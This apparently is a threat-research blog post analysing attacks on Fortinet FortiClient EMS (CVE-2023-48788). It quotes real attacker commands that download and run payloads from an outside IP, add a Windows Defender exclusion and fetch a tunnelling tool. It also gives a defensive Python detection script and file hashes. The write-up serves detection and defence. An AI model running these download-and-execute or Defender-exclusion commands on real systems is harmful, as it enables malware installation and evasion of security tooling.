Despite being a 20-year-old and well-known attack technique, SQL injection remains a prominent vector for threat actors to exploit today’s organizations. Case in point, attackers continue to exploit the documented Fortinet FortiClient EMS Vulnerability, CVE-2023-48788, using SQL injection as the primary incursion point.
Todyl’s Threat Research team recently noticed the attack vector while evaluating a partner’s log data. Let’s explore the attack’s process, outcomes, and techniques you can use to defend against it.
The Todyl team initially saw a log come in from a partner’s Fortinet FortiClient device showing the following parent process:
"C:\Program Files\Microsoft SQL Server\MSSQL14.FCEMS\MSSQL\Binn\sqlservr.exe" -sFCEMS
Because this seemed out of the ordinary, our team investigated further. The child process that really caught our attention was:
"C:\Windows\system32\cmd.exe" /c POWERSHELL.EXE WGET HTTP://196.251.70.167/FR.JS -OUTFILE BVER.BAT
Based on the parent process, this indicated a SQL injection attack per CVE-2023-48788. The parent process spawned a command shell, which executed PowerShell to pull down a file served as FR.JS and save it as a batch file, BVER.BAT.
Next, the attacker ran the exploit again, as evidenced by the same parent process mentioned above. This time, however, the attacker used the command shell to execute the BVER.BAT file:
"C:\Windows\system32\cmd.exe" /c CMD.EXE /C BVER.BAT
When this batch file is executed, it launches the following command:
powershell.exe "Add-MpPreference -ExclusionPath 'C:\ProgramData\Temp'"
The command adds a Windows Defender exclusion for the C:\ProgramData\Temp directory, so Defender will no longer scan that directory or alert on anything malicious placed in it. The same technique was used in a different campaign recently uncovered by the Todyl team:
https://www.todyl.com/blog/threat-advisory-lightperlgirl-malware
The second stage of the attack starts off with the following command, which is still part of the execution of BVER.BAT file:
powershell.exe "wget http://196.251.70.167/responses.xml -outfile audiodg.exe; .\audiodg.exe"
Once again, the command uses PowerShell to pull down a malicious file from the same IP address. This time, however, it downloads responses.xml but saves it as an executable, audiodg.exe, and then runs it.
The third stage involves audiodg.exe being used to execute commands on the system. All third-stage commands have the following parent process:
C:\ProgramData\Temp\audiodg.exe
The attacker first executes tasklist to see what tasks are running on the system.
cmd /c tasklist
Then, they proceed to download another stage of the malware from the same IP address.
cmd /c curl -k https://196.251.70.167/version2.js --output rpcwa.exe
Finally, the attacker issues another recon command.
cmd /c dir
From this point, the attacker can execute other commands as needed, and with the malware payload downloaded they can progress further through the attack lifecycle toward their end goal.
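The chain above can be detected from process lineage alone, without visibility into the SQL injection itself. The following Python script is an added example, not Todyl's tooling: it runs a handful of rules over process-creation events (the field names parent_image, image, command_line and sha256 are assumptions, not any vendor's schema) and flags the FCEMS SQL Server service spawning a shell, a Defender exclusion added from the command line, download cradles whose saved file extension differs from the URL's, audiodg.exe running from anywhere but System32 (the real binary lives there), and the two SHA256 values from the IoC list below. The sample events are constructed to mirror the command lines quoted on this page.

```python
import re
from dataclasses import dataclass

# SHA256 values quoted in the advisory's IoC list.
KNOWN_BAD_SHA256 = {
    "2ddb34438d62b0112bc19e03f51c38a72d8c18164208083d98fe9114b6c01ef6": "audiodg.exe",
    "4619ec1f2bda278722a8ee852a7df3bd0a98311b11e227a63d9c948f73a39b79": "rpcwa.exe (SharpChisel)",
}

@dataclass
class ProcessEvent:
    """One process-creation record; field names are assumed, not a product schema."""
    parent_image: str
    image: str
    command_line: str
    sha256: str = ""  # hash of the started image, if the sensor supplies it

SHELLS = {"cmd.exe", "powershell.exe"}

# Download cradle: tool, a URL, then an output-file switch and its argument.
CRADLE = re.compile(
    r"\b(?:wget|curl|invoke-webrequest|iwr)\b.*?(https?://[^\s;\"']+)"
    r".*?(?:-outfile|--output|-o)\s+([^\s;\"']+)"
)

def _basename(path: str) -> str:
    return path.replace("/", "\\").rstrip("\\").split("\\")[-1].lower()

def _in_system32(path: str) -> bool:
    return "\\windows\\system32\\" in path.lower()

def detect(ev: ProcessEvent) -> list:
    """Return the names of the rules that fire for one event, in rule order."""
    hits = []
    parent, image, cmd = _basename(ev.parent_image), _basename(ev.image), ev.command_line.lower()

    # Rule 1: the FCEMS SQL Server service has no business launching a shell.
    if parent == "sqlservr.exe" and image in SHELLS:
        hits.append("sqlservr_spawns_shell")

    # Rule 2: Defender exclusion added from a command line (first action of BVER.BAT).
    if "add-mppreference" in cmd and "-exclusionpath" in cmd:
        hits.append("defender_exclusion_added")

    # Rule 3: download cradle; escalate when the saved extension differs from the URL's
    # (fr.js -> bver.bat, responses.xml -> audiodg.exe, version2.js -> rpcwa.exe).
    m = CRADLE.search(cmd)
    if m:
        hits.append("download_cradle")
        url_name, out_name = _basename(m.group(1)), _basename(m.group(2))
        if "." in url_name and "." in out_name and \
                url_name.rsplit(".", 1)[1] != out_name.rsplit(".", 1)[1]:
            hits.append("download_extension_mismatch")

    # Rule 4: audiodg.exe is a Windows binary that lives in System32; any other path is masquerading.
    for path in (ev.parent_image, ev.image):
        if _basename(path) == "audiodg.exe" and not _in_system32(path):
            hits.append("audiodg_outside_system32")
            break

    # Rule 5: hash match against the published IoCs.
    if ev.sha256.lower() in KNOWN_BAD_SHA256:
        hits.append("known_bad_hash")
    return hits

def scan(events) -> list:
    """Return (command_line, hits) for every event that fired at least one rule."""
    results = []
    for ev in events:
        hits = detect(ev)
        if hits:
            results.append((ev.command_line, hits))
    return results

# Constructed sample events mirroring the command lines on the page (plus one benign control).
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL14.FCEMS\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\system32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
AUDIODG = r"C:\ProgramData\Temp\audiodg.exe"
SAMPLE_EVENTS = [
    ProcessEvent(SQLSERVR, CMD, r'"C:\Windows\system32\cmd.exe" /c POWERSHELL.EXE WGET HTTP://196.251.70.167/FR.JS -OUTFILE BVER.BAT'),
    ProcessEvent(CMD, PS, r'''powershell.exe "Add-MpPreference -ExclusionPath 'C:\ProgramData\Temp'"'''),
    ProcessEvent(CMD, PS, r'powershell.exe "wget http://196.251.70.167/responses.xml -outfile audiodg.exe; .\audiodg.exe"'),
    ProcessEvent(CMD, AUDIODG, r".\audiodg.exe",
                 sha256="2ddb34438d62b0112bc19e03f51c38a72d8c18164208083d98fe9114b6c01ef6"),
    ProcessEvent(AUDIODG, CMD, "cmd /c tasklist"),
    ProcessEvent(AUDIODG, CMD, "cmd /c curl -k https://196.251.70.167/version2.js --output rpcwa.exe"),
    ProcessEvent(r"C:\Windows\explorer.exe", CMD, "cmd /c dir"),  # benign control, should not fire
]

if __name__ == "__main__":
    for command_line, hits in scan(SAMPLE_EVENTS):
        print(f"{', '.join(hits):60s} <- {command_line}")
```

Rule 1 is the highest-value signal: sqlservr.exe under the FCEMS instance should never have cmd.exe or powershell.exe as a child, so it can be alerted on with very low noise, while rules 3 and 4 catch the later stages even if the initial injection event was missed.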
The Todyl team recommends the following actions to prevent potential compromise:
audiodg.exe
https://tria.ge/250607-dppv3a1pz5
https://www.virustotal.com/gui/file/2ddb34438d62b0112bc19e03f51c38a72d8c18164208083d98fe9114b6c01ef6
SHA256: 2ddb34438d62b0112bc19e03f51c38a72d8c18164208083d98fe9114b6c01ef6
rpcwa.exe (SharpChisel)
https://www.virustotal.com/gui/file/4619ec1f2bda278722a8ee852a7df3bd0a98311b11e227a63d9c948f73a39b79
SHA256: 4619ec1f2bda278722a8ee852a7df3bd0a98311b11e227a63d9c948f73a39b79
https://redcanary.com/blog/threat-intelligence/cve-2023-48788/